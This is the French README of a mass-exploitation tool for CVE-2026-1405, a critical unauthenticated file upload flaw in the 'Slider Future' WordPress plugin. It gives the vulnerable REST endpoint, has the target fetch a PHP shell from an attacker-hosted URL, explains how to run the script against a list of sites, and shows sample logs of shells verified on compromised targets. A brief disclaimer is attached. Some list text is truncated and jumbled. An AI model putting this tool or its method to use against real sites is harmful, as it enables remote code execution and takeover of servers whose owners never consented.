
Slider Future <= 1.0.5 - Téléversement de fichier arbitraire non authentifié
Slider Future <= 1.0.5 - Téléversement arbitraire de fichier non authentifié
Composant : Slider Future (plugin WordPress)
Versions affectées : ≤ 1.0.5
Vulnérabilité : Téléversement arbitraire de fichier non authentifié
CVE : CVE-2026-1405
Score CVSS : 9.8 (Critique)
Le plugin WordPress Slider Future est vulnérable au téléversement arbitraire de fichiers en raison de l'absence de validation du type de fichier dans la fonction slider_future_handle_image_upload dans toutes les versions jusqu'à 1.0.5 incluse. Cela permet à des attaquants non authentifiés de téléverser n'importe quel type de fichier—y compris des shells PHP malveillants—directement sur le serveur affecté, permettant ainsi l'exécution de code à distance.
/wp-json/slider-future/v1/upload-image/image_url (aucune authentification requise).http://example1.com
https://example2.com
...
Exemple : http://yourserver.com/shell.php
python3 CVE-2026-1405.py
Vous serez invité à fournir :
list.txt)Nxploited)success_results.txt./wp-json/slider-future/v1/upload-image/image_url pointant vers votre shell.Cet outil est uniquement destiné à des tests de sécurité éducatifs et autorisés.
Toute utilisation non autorisée contre des sites dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas explicitement reçu la permission de tester est illégale.
Exploit For: CVE-2026-1405
By: Nxploited
Targets loaded: 12
Shell URL: http://yourserver.com/shell.php
Signature: Nxploited
2026-02-20T16:05:23.123456+00:00 | http://target1.com -> SUCCESS | Shell Verified: http://target1.com/wp-content/uploads/2026/02/shell.php
2026-02-20T16:05:24.542342+00:00 | http://target2.com -> Upload failed or shell URL not found.
...
Finished: 3/12 succeeded in 14.7s
Saved successes to success_results.txt